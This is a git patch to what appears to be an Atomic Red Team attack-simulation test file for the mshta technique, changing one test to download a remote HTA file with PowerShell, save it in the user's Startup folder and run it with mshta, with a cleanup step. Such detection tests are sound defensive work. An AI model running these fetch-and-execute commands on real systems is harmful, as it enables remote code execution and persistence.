From 65ecf19fdba3ce40c789e85cd497be545dc3882b Mon Sep 17 00:00:00 2001
From: rsjohnson07 <53159380+rsjohnson07@users.noreply.github.com>
Date: Wed, 22 Jan 2020 09:15:30 -0600
Subject: [PATCH] Update T1170.yaml (#789)

Change test # 4 Mshta Executes Remote HTML Application (HTA)
Updated executor
Updated commands syntax
Added Clean up command
---
 atomics/T1170/T1170.yaml | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 964679e8..72b74fc7 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -59,7 +59,16 @@ atomic_tests:
       description: URL to HTA file for execution
       type: string
       default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/T1170.hta
+    temp_file:
+      description: temp_file location for hta
+      type: string
+      default: $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1170.hta
   executor:
-    name: command_prompt
+    name: powershell
     command: |
-      mshta #{hta_url}
+      $var =Invoke-WebRequest "#{hta_url}"
+      $var.content|out-file "#{temp_file}"
+      mshta "#{temp_file}"
+    cleanup_command: |  
+      remove-item "#{temp_file}" 
+